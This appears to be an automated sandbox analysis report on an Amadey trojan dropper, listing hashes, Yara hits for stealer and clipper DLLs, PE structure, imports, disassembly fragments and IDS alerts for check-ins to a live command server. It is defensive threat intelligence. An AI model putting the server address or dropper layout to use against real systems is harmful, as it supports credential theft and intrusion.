                                                                      SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                                                                      SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                                                                      SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 81%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):251904
                                                                      Entropy (8bit):7.321306380812188
                                                                      Encrypted:false
                                                                      SSDEEP:3072:adiOoncra5PLzEOWFv5rIEWCSvqKejU8DP6CIqzcQyPCzDXCU2+0:adiw2PLoO8+EW31UU8DP8wyPCzDXCF+
                                                                      MD5:5DD55AE0E5CCD8EF2E82679ED0FC11C9
                                                                      SHA1:DD85E81353FE4D09EBD4027121966540186804CE
                                                                      SHA-256:ACE074FAEA020BD3F3AAAB059C4F19F4217DA45BBD1A7DEB06303CCB0B919B91
                                                                      SHA-512:CD09D2392382A6235D050E0B4B88FE307053E5B319022B8EEA7C604BD023CD9B73CFEA54A8B7DAE2150C6A28ED447EC299F3149CD872CBB11E1761E64BF5F778
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 45%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........K...%...%...%.B.....%.....%.....%...^...%...$.y.%.....%.....%.....%.Rich..%.........PE..L....].a............................?q............@.........................................................................<...P....p..............................0................................8..@............................................text............................... ..`.data...............................@....rsrc........p... ..................@..@.reloc...'.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):11264
                                                                      Entropy (8bit):4.97029807367379
                                                                      Encrypted:false
                                                                      SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                                                                      MD5:7E93BACBBC33E6652E147E7FE07572A0
                                                                      SHA1:421A7167DA01C8DA4DC4D5234CA3DD84E319E762
                                                                      SHA-256:850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
                                                                      SHA-512:250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 82%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............*..............@..B.................@......H.......T$...............................................................0...........@s.....@...(....&*..0..K......... ?...(......~....(....,.*r...p.....(....%..(....& ....(....(....&.(....&*..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-.*.(....&(.....o....(....&..X....i2..(....&*....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-.*.(....&.o....(....&..X....i2..(....&*.0..c......... ?...(......~....(....,.*....(............%...(...
                                                                      Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):91136
                                                                      Entropy (8bit):6.3469756750979025
                                                                      Encrypted:false
                                                                      SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                                                                      MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                                                                      SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                                                                      SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                                                                      SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Author: Joe Security
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 81%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):162
                                                                      Entropy (8bit):4.621829903792328
                                                                      Encrypted:false
                                                                      SSDEEP:3:qVoB3tURObOb0qHXboAcMBXqWrKb0GklIVLLPROZ/eIwcWWGu:q43tIkObRHXiMIWObtklI5LPROeIpfGu
                                                                      MD5:1B7C22A214949975556626D7217E9A39
                                                                      SHA1:D01C97E2944166ED23E47E4A62FF471AB8FA031F
                                                                      SHA-256:340C8464C2007CE3F80682E15DFAFA4180B641D53C14201B929906B7B0284D87
                                                                      SHA-512:BA64847CF1D4157D50ABE4F4A1E5C1996FE387C5808E2F758C7FB3213BFEFE1F3712D343F0C30A16819749840954654A70611D2250FD0F7B032429DB7AFD2CC5
                                                                      Malicious:false
                                                                      Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.18.0 (Ubuntu)</center>..</body>..</html>..
                                                                      Process:C:\Windows\SysWOW64\cacls.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):15
                                                                      Entropy (8bit):3.240223928941852
                                                                      Encrypted:false
                                                                      SSDEEP:3:o3F:o1
                                                                      MD5:509B054634B6DE74F111C3E646BC80FD
                                                                      SHA1:99B4C0F39144A92FE42E22473A2A2552FB16BD13
                                                                      SHA-256:07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
                                                                      SHA-512:A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
                                                                      Malicious:false
                                                                      Preview:processed dir:
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):7.809928843076803
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:file.exe
                                                                      File size:538112
                                                                      MD5:f4b906685385629998faa352a94a2e1f
                                                                      SHA1:97ebb6ba0f496f6cabdec20d5c8af07495a00e15
                                                                      SHA256:49d5e821c721205ae44d6ef76450b6a1307e06308900065d18ebad11c6abe74f
                                                                      SHA512:0a0ec9df88fe00c954fed05f4033df0b4c08fbe129045ff174a1c788fe7b0e421ade1bfb0b5881e34ad119bf1c7030341375ebe8c6d78e29a59789fcc0d6ab44
                                                                      SSDEEP:12288:pMryy90yNjwAz3QZDk3JlZdK77HEmCrh8B7l369GVzcr:fyhNjzLaDk3JlZKEfrh8Bp36A0
                                                                      TLSH:FEB4020BB7E88032E8B1677014F902D306377EA1AB7C43D7624AAC5E1C726A4E775767
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.
                                                                      Icon Hash:f8e0e4e8ecccc870
                                                                      Entrypoint:0x406a60
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:10
                                                                      OS Version Minor:0
                                                                      File Version Major:10
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:10
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:646167cce332c1c252cdcb1839e0cf48
                                                                      Instruction
                                                                      call 00007F4FE0FDF935h
                                                                      jmp 00007F4FE0FDF245h
                                                                      push 00000058h
                                                                      push 004072B8h
                                                                      call 00007F4FE0FDF9D7h
                                                                      xor ebx, ebx
                                                                      mov dword ptr [ebp-20h], ebx
                                                                      lea eax, dword ptr [ebp-68h]
                                                                      push eax
                                                                      call dword ptr [0040A184h]
                                                                      mov dword ptr [ebp-04h], ebx
                                                                      mov eax, dword ptr fs:[00000018h]
                                                                      mov esi, dword ptr [eax+04h]
                                                                      mov edi, ebx
                                                                      mov edx, 004088ACh
                                                                      mov ecx, esi
                                                                      xor eax, eax
                                                                      lock cmpxchg dword ptr [edx], ecx
                                                                      test eax, eax
                                                                      je 00007F4FE0FDF25Ah
                                                                      cmp eax, esi
                                                                      jne 00007F4FE0FDF249h
                                                                      xor esi, esi
                                                                      inc esi
                                                                      mov edi, esi
                                                                      jmp 00007F4FE0FDF252h
                                                                      push 000003E8h
                                                                      call dword ptr [0040A188h]
                                                                      jmp 00007F4FE0FDF219h
                                                                      xor esi, esi
                                                                      inc esi
                                                                      cmp dword ptr [004088B0h], esi
                                                                      jne 00007F4FE0FDF24Ch
                                                                      push 0000001Fh
                                                                      call 00007F4FE0FDF76Bh
                                                                      pop ecx
                                                                      jmp 00007F4FE0FDF27Ch
                                                                      cmp dword ptr [004088B0h], ebx
                                                                      jne 00007F4FE0FDF26Eh
                                                                      mov dword ptr [004088B0h], esi
                                                                      push 004010C4h
                                                                      push 004010B8h
                                                                      call 00007F4FE0FDF396h
                                                                      pop ecx
                                                                      pop ecx
                                                                      test eax, eax
                                                                      je 00007F4FE0FDF259h
                                                                      mov dword ptr [ebp-04h], FFFFFFFEh
                                                                      mov eax, 000000FFh
                                                                      jmp 00007F4FE0FDF379h
                                                                      mov dword ptr [004081E4h], esi
                                                                      cmp dword ptr [004088B0h], esi
                                                                      jne 00007F4FE0FDF25Dh
                                                                      push 004010B4h
                                                                      push 004010ACh
                                                                      call 00007F4FE0FDF925h
                                                                      pop ecx
                                                                      pop ecx
                                                                      mov dword ptr [000088B0h], 00000000h
                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa28c0xb4.idata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x7afe0.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x870000x888.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x14100x54.text
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10080x40.text
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xa0000x288.idata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x63140x6400False0.5744140625data6.314163792045976IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .data0x80000x1a480x200False0.609375data4.970639543960129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .idata0xa0000x10520x1200False0.4140625data5.025949912909207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .rsrc0xc0000x7b0000x7b000False0.9250964653201219data7.854359084235584IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x870000x8880xa00False0.746484375data6.222637930812128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                      NameRVASizeTypeLanguageCountry
                                                                      AVI0xcb300x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States
                                                                      RT_ICON0xf94c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States
                                                                      RT_ICON0xffb40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States
                                                                      RT_ICON0x1029c0x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States
                                                                      RT_ICON0x104840x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States
                                                                      RT_ICON0x105ac0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                                                                      RT_ICON0x114540x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
                                                                      RT_ICON0x11cfc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States
                                                                      RT_ICON0x123c40x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                                                                      RT_ICON0x1292c0xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                      RT_ICON0x203000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                                                                      RT_ICON0x228a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                                                                      RT_ICON0x239500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                                                                      RT_ICON0x242d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                                                                      RT_DIALOG0x247400x2f2dataEnglishUnited States
                                                                      RT_DIALOG0x24a340x35cdataRussianRussia
                                                                      RT_DIALOG0x24d900x1b0dataEnglishUnited States
                                                                      RT_DIALOG0x24f400x1b4dataRussianRussia
                                                                      RT_DIALOG0x250f40x166dataEnglishUnited States
                                                                      RT_DIALOG0x2525c0x168dataRussianRussia
                                                                      RT_DIALOG0x253c40x1c0dataEnglishUnited States
                                                                      RT_DIALOG0x255840x1e0dataRussianRussia
                                                                      RT_DIALOG0x257640x130dataEnglishUnited States
                                                                      RT_DIALOG0x258940x150dataRussianRussia
                                                                      RT_DIALOG0x259e40x120dataEnglishUnited States
                                                                      RT_DIALOG0x25b040x122dataRussianRussia
                                                                      RT_STRING0x25c280x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States
                                                                      RT_STRING0x25cb40x86Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0RussianRussia
                                                                      RT_STRING0x25d3c0x520dataEnglishUnited States
                                                                      RT_STRING0x2625c0x52edataRussianRussia
                                                                      RT_STRING0x2678c0x5ccdataEnglishUnited States
                                                                      RT_STRING0x26d580x592dataRussianRussia
                                                                      RT_STRING0x272ec0x4b0dataEnglishUnited States
                                                                      RT_STRING0x2779c0x4b2dataRussianRussia
                                                                      RT_STRING0x27c500x44adataEnglishUnited States
                                                                      RT_STRING0x2809c0x43edataRussianRussia
                                                                      RT_STRING0x284dc0x3cedataEnglishUnited States
                                                                      RT_STRING0x288ac0x2fcdataRussianRussia
                                                                      RT_RCDATA0x28ba80x7ASCII text, with no line terminatorsEnglishUnited States
                                                                      RT_RCDATA0x28bb00x5d302Microsoft Cabinet archive data, many, 381698 bytes, 2 files, at 0x2c +A "bPsg.exe" +A "xriv.exe", ID 1589, number 1, 18 datablocks, 0x1503 compressionEnglishUnited States
                                                                      RT_RCDATA0x85eb40x4dataEnglishUnited States
                                                                      RT_RCDATA0x85eb80x24dataEnglishUnited States
                                                                      RT_RCDATA0x85edc0x7ASCII text, with no line terminatorsEnglishUnited States
                                                                      RT_RCDATA0x85ee40x7ASCII text, with no line terminatorsEnglishUnited States
                                                                      RT_RCDATA0x85eec0x4dataEnglishUnited States
                                                                      RT_RCDATA0x85ef00x9ASCII text, with no line terminatorsEnglishUnited States
                                                                      RT_RCDATA0x85efc0x4dataEnglishUnited States
                                                                      RT_RCDATA0x85f000x9ASCII text, with no line terminatorsEnglishUnited States
                                                                      RT_RCDATA0x85f0c0x4dataEnglishUnited States
                                                                      RT_RCDATA0x85f100x6dataEnglishUnited States
                                                                      RT_RCDATA0x85f180x7ASCII text, with no line terminatorsEnglishUnited States
                                                                      RT_RCDATA0x85f200x7ASCII text, with no line terminatorsEnglishUnited States
                                                                      RT_GROUP_ICON0x85f280xbcdataEnglishUnited States
                                                                      RT_VERSION0x85fe40x408dataEnglishUnited States
                                                                      RT_VERSION0x863ec0x410dataRussianRussia
                                                                      RT_MANIFEST0x867fc0x7e2XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                                                                      DLLImport
                                                                      ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                                      KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
                                                                      GDI32.dllGetDeviceCaps
                                                                      USER32.dllSetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
                                                                      msvcrt.dll_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
                                                                      COMCTL32.dll
                                                                      Cabinet.dll
                                                                      VERSION.dllGetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishUnited States
                                                                      RussianRussia
                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      192.168.2.762.204.41.449808802027700 02/07/23-23:07:30.643129TCP2027700ET TROJAN Amadey CnC Check-In4980880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449869802027700 02/07/23-23:07:47.148730TCP2027700ET TROJAN Amadey CnC Check-In4986980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450136802027700 02/07/23-23:09:00.282670TCP2027700ET TROJAN Amadey CnC Check-In5013680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450427802027700 02/07/23-23:10:16.088952TCP2027700ET TROJAN Amadey CnC Check-In5042780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450041802027700 02/07/23-23:08:35.406746TCP2027700ET TROJAN Amadey CnC Check-In5004180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450197802027700 02/07/23-23:09:17.360535TCP2027700ET TROJAN Amadey CnC Check-In5019780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450332802027700 02/07/23-23:09:52.732684TCP2027700ET TROJAN Amadey CnC Check-In5033280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449774802027700 02/07/23-23:07:22.447558TCP2027700ET TROJAN Amadey CnC Check-In4977480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450393802027700 02/07/23-23:10:07.593303TCP2027700ET TROJAN Amadey CnC Check-In5039380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449713802027700 02/07/23-23:07:06.192941TCP2027700ET TROJAN Amadey CnC Check-In4971380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449746802027700 02/07/23-23:07:13.923684TCP2027700ET TROJAN Amadey CnC Check-In4974680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450074802027700 02/07/23-23:08:44.559819TCP2027700ET TROJAN Amadey CnC Check-In5007480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450270802027700 02/07/23-23:09:37.475504TCP2027700ET TROJAN Amadey CnC Check-In5027080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450304802027700 02/07/23-23:09:45.806702TCP2027700ET TROJAN Amadey CnC Check-In5030480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450422802027700 02/07/23-23:10:14.657368TCP2027700ET TROJAN Amadey CnC Check-In5042280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450013802027700 02/07/23-23:08:27.775982TCP2027700ET TROJAN Amadey CnC Check-In5001380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449897802027700 02/07/23-23:07:54.022407TCP2027700ET TROJAN Amadey CnC Check-In4989780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450398802027700 02/07/23-23:10:08.813551TCP2027700ET TROJAN Amadey CnC Check-In5039880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449779802027700 02/07/23-23:07:23.701655TCP2027700ET TROJAN Amadey CnC Check-In4977980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449975802027700 02/07/23-23:08:18.409780TCP2027700ET TROJAN Amadey CnC Check-In4997580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450108802027700 02/07/23-23:08:53.335185TCP2027700ET TROJAN Amadey CnC Check-In5010880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449970802027700 02/07/23-23:08:15.189928TCP2027700ET TROJAN Amadey CnC Check-In4997080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450103802027700 02/07/23-23:08:51.993571TCP2027700ET TROJAN Amadey CnC Check-In5010380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449892802027700 02/07/23-23:07:52.780225TCP2027700ET TROJAN Amadey CnC Check-In4989280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450079802027700 02/07/23-23:08:45.791597TCP2027700ET TROJAN Amadey CnC Check-In5007980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450309802027700 02/07/23-23:09:47.063197TCP2027700ET TROJAN Amadey CnC Check-In5030980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450254802027700 02/07/23-23:09:33.517906TCP2027700ET TROJAN Amadey CnC Check-In5025480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449852802027700 02/07/23-23:07:42.945716TCP2027700ET TROJAN Amadey CnC Check-In4985280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450180802027700 02/07/23-23:09:13.154966TCP2027700ET TROJAN Amadey CnC Check-In5018080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449926802027700 02/07/23-23:08:04.026093TCP2027700ET TROJAN Amadey CnC Check-In4992680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450287802027700 02/07/23-23:09:41.643242TCP2027700ET TROJAN Amadey CnC Check-In5028780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449959802027700 02/07/23-23:08:12.184455TCP2027700ET TROJAN Amadey CnC Check-In4995980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450410802027700 02/07/23-23:10:11.734233TCP2027700ET TROJAN Amadey CnC Check-In5041080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450226802027700 02/07/23-23:09:24.417895TCP2027700ET TROJAN Amadey CnC Check-In5022680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450471802027700 02/07/23-23:10:28.534174TCP2027700ET TROJAN Amadey CnC Check-In5047180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450018802027700 02/07/23-23:08:28.986007TCP2027700ET TROJAN Amadey CnC Check-In5001880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450152802027700 02/07/23-23:09:04.274600TCP2027700ET TROJAN Amadey CnC Check-In5015280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450443802027700 02/07/23-23:10:21.669848TCP2027700ET TROJAN Amadey CnC Check-In5044380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450365802027700 02/07/23-23:10:00.817411TCP2027700ET TROJAN Amadey CnC Check-In5036580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450282802027700 02/07/23-23:09:40.408974TCP2027700ET TROJAN Amadey CnC Check-In5028280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449824802027700 02/07/23-23:07:34.508277TCP2027700ET TROJAN Amadey CnC Check-In4982480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449741802027700 02/07/23-23:07:12.972313TCP2027700ET TROJAN Amadey CnC Check-In4974180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449954802027700 02/07/23-23:08:10.899376TCP2027700ET TROJAN Amadey CnC Check-In4995480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450337802027700 02/07/23-23:09:53.984195TCP2027700ET TROJAN Amadey CnC Check-In5033780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449718802027700 02/07/23-23:07:07.389632TCP2027700ET TROJAN Amadey CnC Check-In4971880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450046802027700 02/07/23-23:08:37.701237TCP2027700ET TROJAN Amadey CnC Check-In5004680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450360802027700 02/07/23-23:09:59.589638TCP2027700ET TROJAN Amadey CnC Check-In5036080192.168.2.762.204.41.4
